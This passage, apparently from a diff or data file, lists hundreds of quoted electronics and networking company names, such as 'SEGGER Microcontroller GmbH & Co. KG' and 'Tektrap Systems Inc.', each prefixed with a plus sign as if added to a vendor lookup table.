LLC", + "GSI Helmholtzzentrum für Schwerionenforschung GmbH", + "GIGAVISION srl", + "Northwest Signal Supply, Inc", + "Trident Microsystems, Inc.", + "Hills Industries Limited", + "KOKUYO S&T Co., Ltd.", + "Tektrap Systems Inc.", + "Iphion BV", + "Suga Electronics Limited", + "Idaho Technology", + "OMNI-WiFi, LLC", + "x-star networks Inc.", + "Beijing PKUNITY Microsystems Technology Co., Ltd", + "Cedo", + "Korea Maintenance", + "InpegVision Co., Ltd", + "Singapore Technologies Electronics Limited", + "Videon Central, Inc.", + "Moneytech", + "Stj Electronics Pvt Ltd", + "Huachentel Technology Development Co., Ltd", + "FiberPlex Technologies, LLC", + "Eastern Communications Company Limited", + "inIT - Institut Industrial IT", + "interbro Co. Ltd.", + "SE-Elektronic GmbH", + "CoachComm, LLC", + "Integrated Design Tools, Inc.", + "Pico-Tesla Magnetic Therapies", + "SMA Railway Technology GmbH", + "Bitrode Corp.", + "CTERA Networks Ltd.", + "CEVA, Ltd.", + "Wuhan Higheasy Electronic Technology Development Co.Ltd", + "Hainzl Industriesysteme GmbH", + "DS Tech, LLC", + "Hasegawa Electric Co.,Ltd.", + "Meridian Audio Limited", + "Seer Technology, Inc", + "JSC Supertel", + "Wide Corporation", + "Uni-v co.,ltd", + "Neostar Technology Co.,LTD", + "Ruby Tech Corp.", + "Datastrip Inc.", + "PA Bastion CC", + "Terberg besturingstechniek B.V.", + "Ginzinger electronic systems", + "Aquila Technologies", + "Kaga Electronics Co., Ltd.", + "Transact Campus, Inc.", + "Tibbo Technology", + "Phihong USA Corp.", + "Wanzl Metallwarenfabrik GmbH", + "CSSI (S) Pte Ltd", + "Voyant International", + "Kaztek Systems", + "Covia, Inc.", + "Chroma", + "EQ-SYS GmbH", + "Longcheer Technology (Singapore) Pte Ltd", + "Wilo Se", + "Beijing HTTC Technology Ltd.", + "Softwell Technology Co., Ltd.", + "Glocom, Inc.", + "Shanghai Jinghan Weighing Apparatus Co. Ltd.", + "Red Beetle Inc.", + "NUETEQ Technology,Inc.", + "Pacific Biosciences", + "DELEC GmbH", + "Double-Take Software, INC.", + "Trend Electronics Ltd", + "E-Mon", + "Marshall Electronics", + "Broadway Networks", + "Securite Communications / Honeywell", + "IPaXiom Networks", + "Helmholtz Centre Berlin for Material and Energy", + "Vestac", + "Objective Interface Systems, Inc.", + "Alflex", + "Union Business Machines Co. Ltd.", + "Isotek Electronics Ltd", + "SOAM Systel", + "Goldline Controls", + "Systel Sa", + "Packet Forensics LLC", + "RDC, Inc. dba LynTec", + "Luminous Power Technologies Pvt. Ltd.", + "EasyData Hardware GmbH", + "Andes Technology Corporation", + "Samjeon", + "Lasercraft Inc", + "Gorba AG", + "Future Innovation Tech Co.,Ltd", + "Kedah Electronics Engineering, LLC", + "Nicira Networks", + "KISS Teknical Solutions, Inc.", + "Power Instruments Pte Ltd", + "SEGGER Microcontroller GmbH & Co. KG", + "Active Storage Inc.", + "Proview Eletrônica do Brasil LTDA", + "HUTH Elektronik Systeme GmbH", + "beyerdynamic GmbH & Co. KG", + "Superflow Technologies Group", + "Novita", + "4RF Communications Ltd", + "Hangzhou Siyuan Tech. Co., Ltd", + "Telesis Technologies, Inc.", + "Mattel Inc.", + "Nivis Llc", + "Advanced Realtime Tracking GmbH", + "Albrecht Jung GmbH & Co. KG", + "All Earth Comércio de Eletrônicos LTDA.", + "Anviz Biometric Tech. Co., Ltd.", + "California Eastern Laboratories", + "XMOS Semiconductor", + "Cnrs", + "Chengdu 30Kaitian Communication Industry Co.Ltd", + "Woori SMT Co.,ltd", + "NEC Australia Pty Ltd", + "Nippon Conlux Co., Ltd.", + "Fisher-Rosemount Systems Inc.", + "Apass Technology Co., Ltd.", + "Eaton Corp. Electrical Group Data Center Solutions - Pulizzi", + "Cinetal", + "Teradici Corporation", + "Guangzhou New Postcom Equipment Co.,Ltd.", + "Entorian Technologies", + "Byzoro Networks Ltd.", + "Strukton Systems bv", + "Ceton Corp", + "SoundEar A/S", + "WeLink Solutions, Inc.", + "WIRECOM Technologies", + "A4SP Technologies Ltd.", + "Jäger Computergesteuerte Meßtechnik GmbH.", + "Uwin Technologies Co.,LTD", + "Rohati Systems", + "CAI Networks, Inc.", + "Certicom Corp", + "JumpGen Systems, LLC", + "Indiana Life Sciences Incorporated", + "eSang Technologies Co., Ltd.", + "Neat Electronics", + "EW3 Technologies LLC", + "Full Spectrum Inc.", + "Solutronic GmbH", + "Lumasense Technologies", + "Dac Engineering Co., Ltd.", + "Thai Radio Co, LTD", + "TopControl GMBH", + "Electronic Design and Manufacturing Company", + "Wescon Technology, Inc.", + "Powersoft Srl", + "Sejin Electron, Inc.", + "Bocom Security(Asia Pacific) Limited", + "The Crypto Group", + "Universal Devices Inc.", + "Ross Controls", + "Triacta Power Technologies Inc.", + "Alcatel-Lucent France - Wtd", + "Radio Frequency Systems", + "Starlight Video Limited", + "CommAgility Ltd", + "Firepro Wireless", + "Matuschek Messtechnik GmbH", + "Ion Torrent Systems, Inc.", + "W. L. Gore & Associates", + "Seoultek Valley", + "Prologix, LLC.", + "3DSP Corp", + "Dbii Networks", + "Vacon Plc", + "Shenzhen HAMP Science & Technology Co.,Ltd", + "Semptian Technologies Ltd.", + "Riccius+Sohn GmbH", + "Indigo Mobile Technologies Corp.", + "ubisys technologies GmbH", + "Shinsei Industries Co.,Ltd", + "Synapse Électronique", + "KURUSUGAWA Electronics Industry Inc,.", + "VRmagic GmbH", + "Aerosat Avionics", + "Seowonintech Co Ltd.", + "Respironics, Inc.", + "SeaMicro Inc.", + "D-TACQ Solutions Ltd", + "A-Team Technology Ltd.", + "Scimolex Corporation", + "byd:sign Corporation", + "Telerad Sa", + "RIVA Networks Inc.", + "MICRORISC s.r.o.", + "Xenatech Co.,LTD", + "Cybertech Inc.", + "Sontheim Industrie Elektronik GmbH", + "SmartSynch, Inc", + "Hanlong Technology Co.,LTD", + "Signalion GmbH", + "Ellion Digital Inc.", + "Phabrix Limited", + "Witelcom AS", + "WiWide Inc.", + "Heol Design", + "AirLogic Systems Inc.", + "Teraview Technology Co., Ltd.", + "JSC Stilsoft", + "Talent Communication Networks Inc.", + "Digital Forecast", + "EdgeVelocity Corp", + "A-Trust Computer Corporation", + "I.s High Tech.inc", + "Goodmill Systems Ltd", + "Metris USA Inc.", + "GE Transportation Systems", + "Construcciones y Auxiliar de Ferrocarriles, S.A.", + "Qbit GmbH", + "Bellwin Information Co. Ltd.,", + "Positron", + "Electro-Optical Imaging, Inc.", + "Openmoko, Inc.", + "Num Ag", + "Microbit 2.0 AB", + "Doble Engineering", + "Ray Shine Video Technology Inc", + "BISA Technologies (Hong Kong) Limited", + "Rapid Mobile (Pty) Ltd", + "Cdvi", + "Mueller-Elektronik GmbH & Co. KG", + "iTAS Technology Corp.", + "AZTEQ Mobile", + "Pascom Kommunikations systeme GmbH.", + "From2", + "Epic Systems Inc", + "Stoneridge Electronics AB", + "ACS Solutions France", + "Berker GmbH & Co. KG", + "Adventiq Ltd.", + "UVT Unternehmensberatung fur Verkehr und Technik GmbH", + "Thinkware Co. Ltd.", + "KOBISHI ELECTRIC Co.,Ltd.", + "Ben-Ri Electronica S.a.", + "KwikByte, LLC", + "COmputime Ltd.", + "TOYO ELECTRIC Corporation", + "Lyngbox Media AB", + "Middle Atlantic Products Inc", + "Kozio, Inc.", + "Sing Fai Technology Limited", + "TBTech, Co., Ltd.", + "Welkin Sciences, LLC", + "City Theatrical", + "Jeulin S.a.", + "KIMIN Electronic Co., Ltd.", + "CRFS Limited", + "MEL Co.,Ltd.", + "Andor System Support Co., Ltd.", + "Recall Technologies, Inc.", + "Sigmalink", + "CiriTech Systems Inc", + "Thermo Fisher Scientific", + "Pcs", + "Symx Systems, Inc.", + "ddm hopt + schuler Gmbh + Co. KG", + "ZEFATEK Co.,LTD", + "Wibrain", + "Sherwood Information Partners, Inc.", + "Sougou Keikaku Kougyou Co.,Ltd.", + "Renesas Technology Sales Co., Ltd.", + "Network Critical Solutions Ltd", + "Shantou Institute of Ultrasonic Instruments", + "SBS Science & Technology Co., Ltd", + "Dat H.k. Limited", + "Visioneered Image Systems", + "Radionor Communications", + "Algolith", + "GainSpan Corp.", + "Nextvision Sistemas Digitais De Televisão Ltda.", + "Commtest Instruments Ltd", + "L-3 Communications Geneva Aerospace", + "CyVerse Corporation", + "Digifriends Co. Ltd", + "Electronic Educational Devices, Inc", + "BestComm Networks, Inc.", + "Gigamon Systems LLC", + "Cyan Optic, Inc.", + "Hokuyo Automatic Co., Ltd.", + "Micran Ltd.", + "Gennet s.a.", + "Shenzhen Dolphin Electronic Co., Ltd", + "Analogue & Micro Ltd", + "Rohm Co., Ltd.", + "Shinwa Industries(China) Ltd.", + "Clearwire", + "Guangzhou Gateway Electronics Co., Ltd", + "Sensor-Technik Wiedemann GmbH", + "Covote GmbH & Co KG", + "Hardy Instruments", + "Avidyne Corporation", + "Muscle Corporation", + "mh acoustics LLC", + "Viconics Electronics Inc.", + "Highpro International R&D Co,.Ltd.", + "Hyundai Telecom", + "NSGate", + "Eyeheight Ltd.", + "Wideband Semiconductor, Inc.", + "BIJ Corporation", + "Tom Communication Industrial Co.,Ltd.", + "VaultStor Corporation", + "Rockridgesound Technology Co.", + "Alcad SL", + "Kramer Electronics Ltd.", + "TCM Mobile LLC", + "Indra Sistemas, S.a.", + "Dasan Tps", + "GlobalTop Technology Inc.", + "Exegin Technologies Limited", + "Advanced Electronic Design, Inc.", + "Transystem Inc.", + "Cranite Systems, Inc.", + "Shunra Software Ltd.", + "FEIG ELECTRONIC GmbH", + "Opticomm Corporation", + "Enzytek Technology Inc.,", + "Empacket Corporation", + "SUPoX Technology Co. , LTD.", + "Media Technology Systems Inc", + "Innes", + "Wyplay Sas", + "Newbury Networks, Inc.", + "COVAX Co. Ltd", + "Terra", + "Win4NET", + "Audiomatica Srl", + "King Champion (Hong Kong) Limited", + "By Techdesign", + "Design Solutions Inc.", + "Kwang Sung Electronics Co., Ltd.", + "Advanced Relay Corporation", + "Macab Ab", + "TASA International Limited", + "Gener8, Inc.", + "Sicert S.r.L.", + "Thomas Instrumentation, Inc", + "Optsys Technology Co., Ltd.", + "SmartAnt Telecom", + "Nucsafe Inc.", + "emtrion GmbH", + "VDG-Security bv", + "Element Labs, Inc.", + "WaveStorm", + "Echo360, Inc.", + "Kenwin Industrial(Hk) Ltd.", + "Intellitect Water Ltd", + "G.i.N. mbH", + "TRANSRADIO SenderSysteme Berlin AG", + "Renkus-Heinz, Inc.", + "Valeo VECS", + "Packet Vision Ltd", + "JoeScan, Inc.", + "Winland Electronics, Inc.", + "FlexRadio Systems", + "Synapse", + "FLIR Systems Inc", + "Identec Solutions", + "Daviscomms (S) Pte Ltd", + "Beijing Run Technology LTD. Company", + "Kingtek Cctv Alliance Co., Ltd.", + "Vector Technology Corp.", + "W&W Communications, Inc.", + "HOLUX Technology, Inc.", + "Silver Peak Systems, Inc.", + "Telchemy, Incorporated", + "UBI&MOBI,.Inc", + "Finsoft Ltd", + "DATAQ Instruments, Inc.", + "CXR Anderson Jacobson", + "Faiveley Transport", + "China Gridcom Co., Ltd", + "IsaacLandKorea Co., Ltd,", + "Divinet Access Technologies Ltd", + "Telular Corp.", + "DTL Broadcast Ltd", + "Awox", + "Violin Technologies", + "ChongQing JINOU Science & Technology Development CO.,Ltd", + "Tsubata Engineering Co.,Ltd. (Head Office)", + "Proxicast", + "Yi-Qing CO., LTD", + "Coherent", + "Palit Microsystems ( H.K.) Ltd.", + "IEEE I&M Society TC9", + "Icron Technologies Corporation", + "Welch Allyn, Inc.", + "dataschalt e+a GmbH", + "Samyoung Electronics", + "Loopcomm Technology, Inc.", + "Keumbee Electronics Co.,Ltd.", + "Blueone Technology Co.,Ltd", + "Network Automation mxc AB", + "Wise & Blue", + "Caton Overseas Limited", + "Visionite Inc.", + "RON-Telecom ZAO", + "TPine Technology", + "Tilera Corporation", + "Pmc", + "Petratec", + "Fargo Co., Ltd.", + "Faster Technology LLC", + "Dongahelecomm", + "Doah Elecom Inc.", + "Technowave Ltd.", + "A-Four Tech Co., Ltd.", + "FusionDynamic Ltd.", + "V One Multimedia Pte Ltd", + "Impro Technologies", + "Mamiya Digital Imaging Co., Ltd.", + "Smarty (HZ) Information Electronics Co., Ltd", + "Teleco, Inc.", + "Ecler S.a.", + "Digital Multimedia Technology Co., Ltd", + "Qumranet Inc.", + "Ircona", + "Shenzhen Seecomm Technology Co.,Ltd.", + "Chengdu ethercom information technology Ltd.", + "Zeutschel GmbH", + "Broadata Communications, Inc", + "TRAK Microwave", + "Qualitrol", + "HandHeld entertainment, Inc.", + "Altai Technologies Limited", + "Intellio Ltd", + "Paradox Security Systems Ltd", + "Deltanode Solutions AB", + "Delta Dore", + "Axesstel Inc.", + "Acconet (PTE) Ltd", + "Aipermon GmbH & Co. KG", + "gemalto e-Payment", + "Datum Systems, Inc.", + "Digital Video Networks(Shanghai) CO. LTD.", + "Harman Multimedia", + "Fujian Stelcom information & Technology CO.,Ltd", + "Testo Ag", + "Gigamips", + "Oesolutions", + "CCT R&D Limited", + "MAZeT GmbH", + "Northrop Grumman Systems Corp.", + "Sonitrol Corporation", + "Gridpoint Systems", + "DoCoMo Systems, Inc.", + "Jenaer Antriebstechnik GmbH", + "Lg Information & Comm.", + "WiQuest Communications", + "Raybit Systems Korea, Inc", + "Z-Com, Inc.", + "CS Corporation", + "Viprinet GmbH", + "Real Time Automation", + "Eliwell Controls srl", + "Essence Technology Solution, Inc.", + "New Voice International AG", + "Videology Imaging Solutions, Inc.", + "Blue Zen Enterprises Private Limited", + "Topdata Sistemas de Automacao Ltda", + "AtRoad, A Trimble Company", + "High-Gain Antennas LLC", + "Teamcast", + "OPW Fuel Management Systems", + "LBNL Engineering", + "Irlink", + "PayTec AG", + "Atech Technology Co., Ltd.", + "CM Comandos Lineares", + "SCHRACK Seconet AG", + "Compro Technology", + "Prostar Co., Ltd.", + "Montgomery Technology, Inc.", + "Maxim Integrated Products", + "Intercross, Llc", + "E28 Shanghai Limited", + "Expertise Engineering", + "Network Chemistry, Inc", + "Ooma, Inc.", + "Aeromaritime Systembau GmbH", + "SWsoft", + "EyeFi, Inc", + "Lianhe Technologies, Inc.", + "Bogen Communications", + "CENITS Co., Ltd.", + "Encore Software Limited", + "High Tech Computer Corp", + "Cale Access AB", + "Artec Design", + "Taiwan Video & Monitor", + "Kingjim", + "Protec Fire Detection plc", + "Tiqit Computers, Inc.", + "Great Well Electronic LTD", + "RadioCOM, s.r.o.", + "IPTrade S.A.", + "E-Tek Digital Technology Limited", + "Unigrand Ltd", + "Beijing Xinwei Telecom Technology Co., Ltd.", + "Brilliant Telecommunications", + "Suprema Inc.", + "Amulet Hotkey", + "Fa", + "Camrivox Ltd.", + "Kelman Limited", + "HYUNDAI DIGITECH Co, Ltd.", + "LinTech GmbH", + "iMCA-GmbH", + "Magnum Semiconductor, Inc.", + "Spans Logic", + "SmarTire Systems Inc.", + "Worldsmart Retech", + "Gambro Lundia AB", + "Aftek Infosys Limited", + "Theo Benning GmbH & Co. KG", + "ISCO International", + "Dust Networks Inc.", + "Twig Com Ltd.", + "Contela, Inc.", + "XENOLINK Communications Co., Ltd.", + "Arkino HiTOP Corporation Limited", + "Vinci Labs Oy", + "wisembed", + "LoBenn Inc.", + "Kiyon, Inc.", + "Central Music Co.", + "Elesta GmbH", + "Obsidian Research Corporation", + "Avago Technologies", + "Defidev", + "International Business Machines", + "Axcen Photonics Corporation", + "Studer Professional Audio GmbH", + "3Leaf Networks", + "Ezurio Ltd", + "Tonic DVB Marketing Ltd", + "Alstom Transport", + "J-Tek Incorporation", + "T&A Mobile Phones", + "QDI Technology (H.K.) Limited", + "Shinco Electronics Group Co.,Ltd", + "InGrid, Inc", + "Senea AB", + "TDA Tech Pty Ltd", + "Synccom Co., Ltd", + "NAT Seattle, Inc.", + "Tandberg Storage ASA", + "North Atlantic Industries", + "Caspian", + "L-3 Communications, Aviation Recorders", + "Osung Midicom Co., Ltd", + "INFRANET, Inc.", + "Dansensor A/S", + "Quantier Communication Inc.", + "Liyuh Technology Ltd.", + "Novatium Solutions (P) Ltd", + "Prod-El SpA", + "Precision I/O", + "Fusiontech Technologies Inc.", + "LEGO System A/S IE Electronics Division", + "Hoatech Technologies, Inc.", + "Kratos EPD", + "Pangolin", + "Vativ Technologies", + "Geutebrück GmbH", + "Togami Electric Mfg.co.,Ltd.", + "Vector Informatik GmbH", + "Biometric Access Company", + "Communications & Power Industries", + "Elisa Oyj", + "Bally Gaming + Systems", + "Teneros, Inc.", + "e:cue", + "Sequans Communications", + "NewSoft Technology Corporation", + "Nevis Networks Inc.", + "Sane System Co., Ltd", + "DG2L Technologies Pvt. Ltd.", + "Xiranet Communications GmbH", + "Red-Lemon", + "Tahoe", + "ShinMaywa Industries, Ltd.", + "Autotelenet Co.,Ltd", + "Ambient Corporation", + "Schenck Process GmbH", + "MAKUS Inc.", + "Telefin S.p.A.", + "Littelfuse Startco", + "Kingtronics Industrial Co. Ltd.", + "Robatech AG", + "Terascala, Inc.", + "Mad Catz Interactive Inc", + "Eca-Sinters", + "Reti Corporation", + "Surf Communication Solutions Ltd.", + "Uquest, Ltd.", + "MOBILE TECHNIKA Inc.", + "Canesta Inc.", + "Ruf Telematik AG", + "Jennic Ltd", + "N3 Corporation", + "TenX Networks, LLC", + "Meteor Communications Corporation", + "Numatics, Inc.", + "Isilon Systems Inc.", + "Vantage Controls", + "Iec", + "Nits Technology Inc", + "ITG Worldwide Sdn Bhd", + "Q-Matic Sweden AB", + "Sampo Corporation", + "Cytyc Corporation", + "RadioPulse Inc.", + "Wi-Gear Inc.", + "Techsphere Co., Ltd", + "EFS sas", + "Microhard S.r.l.", + "PROFIcomms s.r.o.", + "Plus Technology Co., Ltd", + "Airak, Inc.", + "Data Display AG", + "mm-lab GmbH", + "IP Fabrics, Inc.", + "Jeongmin Electronics Co.,Ltd.", + "Globo Electronic GmbH & Co. KG", + "NEC Magnus Communications,Ltd.", + "Iteris, Inc.", + "Eubus GmbH", + "RF Technologies", + "Business Security OL AB", + "Stolinx,. Inc", + "Nortech International", + "BTI Systems Inc.", + "Nf Corporation", + "Open Interface North America", + "Akorri", + "Bountiful WiFi", + "Accsense, Inc.", + "Grandtec Electronic Corp.", + "Dex Security Solutions", + "Cavera Systems", + "Klas Ltd", + "Aditec Co. Ltd", + "Moram Co., Ltd.", + "Psia", + "Technolution", + "Advantech Technologies Co.,Ltd", + "Symwave", + "Inventec Multimedia & Telecom Corporation", + "Deicy Corporation", + "Hifn, Inc.", + "Rheinmetall Canada Inc.", + "Prokom Software SA", + "ArrowSpan Inc.", + "Scosche Industries, Inc.", + "Gkb Cctv Co., Ltd.", + "NL Technology", + "Atx", + "Lightron Fiber-Optic Devices Inc.", + "YDT Technology International", + "Quintron Systems Inc.", + "K-ubique ID Corp.", + "Ciara Technologies Inc.", + "MaxLinear Hispania S.L.U.", + "Wavesat", + "NUMA Technology,Inc.", + "Jablotron", + "Intelligent Control Systems (Asia) Pte Ltd", + "Ryvor Corp.", + "Tii Network Technologies, Inc.", + "SHOEI Electric Co.,Ltd", + "Cetacea Networks Corporation", + "American Security Products Co.", + "Media System Planning Corp.", + "Smartvue Corporation", + "Realm Systems, Inc.", + "ProTelevision Technologies A/S", + "Silver Spring Networks, Inc", + "Kinghold", + "Termtek Computer Co., Ltd", + "Interactek", + "Euro Protection Surveillance", + "Cortina Systems Inc", + "Micro Memory Curtiss Wright Co", + "Eppendorf Instrumente GmbH", + "Shandong New Beiyang Information Technology Co.,Ltd", + "CellPoint Connect", + "VS Industry Berhad", + "Wit S.a.", + "Perfect tech", + "TGC America, Inc", + "Bitatek CO., LTD", + "AVG Advanced Technologies", + "Trane", + "Projectek Networking Electronics Corp.", + "Optimus Ic S.a.", + "Epicom, Inc.", + "Always On Wireless", + "Thx Ltd", + "ZIEHL industrie-electronik GmbH + Co KG", + "Telecommunications Industry Association TR-41 Committee", + "Santa Barbara Infrared, Inc.", + "Fusion Digital Technology", + "Work Microwave GmbH", + "Vialta, Inc.", + "O2Micro, Inc.", + "First International Computer do Brasil", + "Yulinet", + "KYOWA Electric & Machinery Corp.", + "KWS Computersysteme GmbH", + "Trust International B.V.", + "ISR TECHNOLOGIES Inc", + "IEE, Inc.", + "RAE Systems", + "Aiware Inc.", + "Sensory Networks Inc", + "Montilio", + "Advance Sterilization Products", + "Lab33 Srl", + "Kaimei Electroni", + "Thermo Electron Karlsruhe", + "Dai Nippon Printing Co., Ltd", + "March Networks S.p.A.", + "Digital Lifestyles Group, Inc.", + "Ascalade Communications Limited", + "Vivaas Technology Inc.", + "FROMUS TEC. Co., Ltd.", + "Danelec Electronics A/S", + "JRC TOKKI Co.,Ltd.", + "Sanei Electric Inc.", + "Innovative Integration", + "IWICS Inc.", + "Hua Jung Components Co., Ltd.", + "T.o.m Technology Inc..", + "GES Co, Ltd", + "S Net Systems Inc.", + "Heidelberg Engineering GmbH", + "Koenig & Bauer AG", + "Ieee 802.3", + "CE-Infosys Pte Ltd", + "Picaso Infocommunication CO., LTD.", + "Netfabric Corporation", + "Conitec Datensysteme GmbH", + "Shanghai Ruijie Technology", + "Quest Technologies", + "Vision Netware Co.,Ltd", + "Vtech Engineering Canada Ltd", + "AGP Telecom Co. Ltd", + "Elexol Pty Ltd", + "Yoshimiya Co.,Ltd.", + "Open Systems International", + "Fortelink Inc.", + "Simtec Electronics", + "US Digital Television, Inc", + "Cotron Corporation", + "HomeLogic LLC", + "Eutech Instruments Pte. Ltd.", + "CTS-Clima Temperatur Systeme GmbH", + "Hanchang System Corp.", + "Aerotech Inc", + "IMI Norgren Ltd", + "Singim International Corp.", + "System Spa Dept. Electronics", + "ITX Security Co., Ltd.", + "Trident Tek, Inc.", + "HandEra, Inc.", + "Long Range Systems, Inc.", + "TEN Technology", + "Axsun Technologies", + "Telesynergy Research Inc.", + "CET Technologies Pte Ltd", + "Control4", + "Merit Li-Lin Ent.", + "Nippon Denso Industry Co., Ltd.", + "Prolon Control Systems", + "Nanometrics Inc.", + "Assurance Technology Corp", + "Shinboram", + "Honeywell CMSS", + "Loud Technologies Inc.", + "nex-G Systems Pte.Ltd", + "Jung Myoung Communications&Technology", + "Fraunhofer FOKUS", + "NComputing Co.,Ltd.", + "Damm Cellular Systems A/S", + "Streamit", + "Alcatel DI", + "Aichi Electric Co., Ltd.", + "Schwechat - RISE", + "West Instruments", + "BBox", + "FTA Communication Technologies", + "Obzerv Technologies", + "icube Corp.", + "KeyMed Ltd", + "DGT Sp. z o.o.", + "Timespace Technology", + "S2 Security Corporation", + "Nexus Technologies", + "Photometrics, Inc.", + "Microhard Systems Inc.", + "Winnertec System Co., Ltd.", + "Genexis BV", + "Adder Technology Limited", + "Sanmei Electronics Co.,Ltd", + "GateWare Communications GmbH", + "WTSS Inc", + "Tableau, LLC", + "COPAN Systems Inc.", + "Zoran Corporation", + "VineSys Technology", + "Filtronic plc", + "Aksys, Ltd.", + "Lowrance Electronics, Inc.", + "Macey Enterprises", + "Optoway Technology Incorporation", + "Fujinon Corporation", + "WaveSplitter Technologies, Inc.", + "Synchronic Engineering", + "Kentima Technologies AB", + "Knovative, Inc.", + "Prodrive B.V.", + "Nisca corporation", + "Mindray Co., Ltd.", + "Sinar Ag", + "Zipher Ltd", + "TalkSwitch", + "Tellion INC.", + "Skov A/S", + "iPAC Technology Co., Ltd.", + "Newcotech,Ltd", + "Guangzhou Gaoke Communications Technology Co.ltd.", + "Shanghai Xun Shi Communications Equipment Ltd. Co.", + "CNCR-IT CO.,LTD,HangZhou P.R.CHINA", + "McAfee, Inc", + "Milénio 3 Sistemas Electrónicos, Lda.", + "AlphaCell Wireless Ltd.", + "Waveplus Technology Co., Ltd.", + "Changchun Huayu WEBPAD Co.,LTD", + "Lemke Diagnostics GmbH", + "ParkerVision - Direct2Data", + "360SUN Digital Broadband Corporation", + "Gemsoc Innovision Inc.", + "Electronics Line 3000 Ltd.", + "Amtelco", + "Gemstar Technology Development Ltd.", + "in2 Networks", + "Nihon Mechatronics Co.,Ltd.", + "Transact Technologies Inc", + "Systems in Progress Holding GmbH", + "Incipient, Inc.", + "Hannae Technology Co., Ltd", + "ACCESS Systems Americas, Inc.", + "MTU Friedrichshafen GmbH", + "Hach Company", + "Harms & Wende GmbH & Co.KG", + "Olympus Soft Imaging Solutions GmbH", + "Roche Diagnostics GmbH", + "Netcodec co.", + "Symantec Corporation", + "Simrad Optronics ASA", + "Stryker Corporation", + "Bright", + "Anton Paar GmbH", + "DIGINICS, Inc.", + "Vac", + "ICPDAS Co.,LTD", + "AT Sweden AB", + "AirMagnet, Inc", + "Bel Fuse Europe Ltd.,UK", + "THALES Elektronik Systeme GmbH", + "EchoStar Global B.V.", + "Advantech AMT Inc.", + "Kingtel Telecommunication Corp.", + "Shenzhen Coship Software Co.,LTD.", + "Wireless Matrix Corp.", + "Pepperl+Fuchs GmbH", + "DiGATTO Asia Pacific Pte Ltd", + "FalconStor Software", + "Hokuto Denshi Co,. Ltd.", + "Consensys Computers Inc.", + "M-Audio", + "Smart Empire Investments Limited", + "Amity Systems, Inc.", + "RF Micro Devices", + "Fabric7 Systems, Inc", + "Orbital Sciences Corp.; Launch Systems Group", + "Galazar Networks", + "Triton Systems of Delaware, Inc.", + "AEWIN Technologies Co., Ltd.", + "King Tsushin Kogyo Co., LTD.", + "Bils Technology Inc", + "Huber + Suhner AG", + "Datamax Corporation", + "Ember Corporation", + "VTI Instruments Corporation", + "Option International N.V.", + "NeuroCom International, Inc.", + "GuangZhou AnJuBao Co., Ltd", + "Symetrix", + "Itcare Co., Ltd", + "Passave Inc.", + "HGST a Western Digital Company", + "Premier Technolgies, Inc", + "Nanjing Seu Mobile & Internet Technology Co.,Ltd", + "BeWAN systems", + "AutoCell Laboratories, Inc.", + "Turbo Networks Co.Ltd", + "Mega-Trend Electronics CO., LTD.", + "Asahikasei Technosystem Co.,Ltd.", + "Inqnet Systems, Inc.", + "DENTSPLY - Gendex", + "Foxboro Eckardt Development GmbH", + "cybernet manufacturing inc.", + "AboveCable, Inc.", + "Sanden Corporation", + "Sentec E&E Co., Ltd.", + "Unitronics LTD", + "Vtech Innovation LP dba Advanced American Telephones", + "WebWayOne Ltd", + "Star Semiconductor Corporation", + "Vixen Co., Ltd.", + "IceFyre Semiconductor", + "Compellent Technologies, Inc.", + "Grand Electronic Co., Ltd", + "Schaffner EMV AG", + "Sunin Telecom", + "Amtek system co.,LTD.", + "Eve Systems GmbH", + "M&S Systems", + "Salland Engineering (Europe) BV", + "Iscutum", + "Harmonic Video Network", + "Prompttec Product Management GmbH", + "LETEK Communications Inc.", + "Mentor Engineering Inc", + "Tellium Incorporated", + "Telson Electronics Co., Ltd", + "Hanwang Technology Co.,Ltd", + "ACM Systems", + "Amd", + "Logical Solutions", + "Scientific Technologies Inc.", + "Sentinel Wireless Inc.", + "OQO, Inc.", + "HUMEX Technologies Corp.", + "Communications & Power Industries / Satcom Division", + "Tecnova", + "Nitgen Co., Ltd", + "Abatron AG", + "MoTEX Products Co., Ltd.", + "LAP Laser Applikations", + "inc.jet, Incorporated", + "Lumenera Corporation", + "Nokia NET Product Operations", + "Weintek Labs. Inc.", + "ELIAS Technology, Inc.", + "Quest Technical Solutions Inc.", + "Anator", + "Telio Communications GmbH", + "Mettler & Fuchs AG", + "MediaQ", + "Avionic Design GmbH", + "Compucase Enterprise Co. Ltd.", + "S-Takaya Electronics Industry Co.,Ltd.", + "FullWave Technology Co., Ltd.", + "Exemys Srl", + "D-NET International Corporation", + "Fagor Automation , S. Coop", + "AirFlow Networks", + "Free2move AB", + "Agfa Ndt Inc.", + "Multiplex, Inc.", + "SercoNet Ltd.", + "Cambridge Industries Group (CIG)", + "Concord Idea Corp.", + "commax Co., Ltd.", + "Advanced Energy", + "Align Engineering LLC", + "Kaparel Corporation", + "Fujikura Solutions Ltd.", + "Miyakawa Electric Works Ltd.", + "Ritter Elektronik", + "Sirius System Co, Ltd.", + "Neff Instrument Corp.", + "Lawo AG", + "Taifatech Inc.", + "Sychip Inc.", + "Ascent Corporation", + "Akita Electronics Systems Co.,Ltd.", + "Avvio Networks", + "Connexionz Limited", + "Hanback Electronics Co., Ltd.", + "CloudShield Technologies, Inc.", + "HyperEdge", + "Emuzed", + "CONTAL OK Ltd.", + "Yantai ZhiYang Scientific and technology industry CO., LTD", + "Bosch Rexroth", + "Agile Systems Inc.", + "dBm Optics", + "Ifoundry Systems Singapore", + "LayerZero Power Systems, Inc.", + "Vernier Networks, Inc.", + "NURI Telecom Co., Ltd.", + "JEPICO Corporation", + "Color Kinetics", + "Rupprecht & Patashnick Co.", + "Maxlink Industries Limited", + "Brooks Automation GmbH", + "Systek Inc.", + "XPAK MSA Group", + "Brainchild Electronic Co., Ltd.", + "BeamReach Networks", + "bplan GmbH", + "NovaPal Ltd", + "Kentec Electronics", + "Otrum Asa", + "ScottCare Corporation", + "LOYTEC electronics GmbH", + "Digital Electronic Network", + "J-THREE INTERNATIONAL Holding Co., Ltd.", + "Allied Vision Technologies", + "Avery Dennison Deutschland GmbH", + "Enerpoint Ltd.", + "Crown Audio -- Harmanm International", + "TB Group Inc", + "Rainsun Enterprise Co., Ltd.", + "The Advantage Group", + "SUNNY bell Technology Co., Ltd.", + "Walchem Corporation", + "Tadiran Telecom Business Systems LTD", + "almedio inc.", + "CEIA S.p.A.", + "Pan Dacom Networking AG", + "Optical Communications Products Inc.", + "Cellinx Systems Inc.", + "Power-One as", + "MARKEM Corporation", + "HemoCue AB", + "M+F Gwinner GmbH & Co", + "Olitec", + "Cornelius Consult", + "Molecular Devices Corporation", + "Noritz Corporation", + "Lassen Research", + "Vichel Inc.", 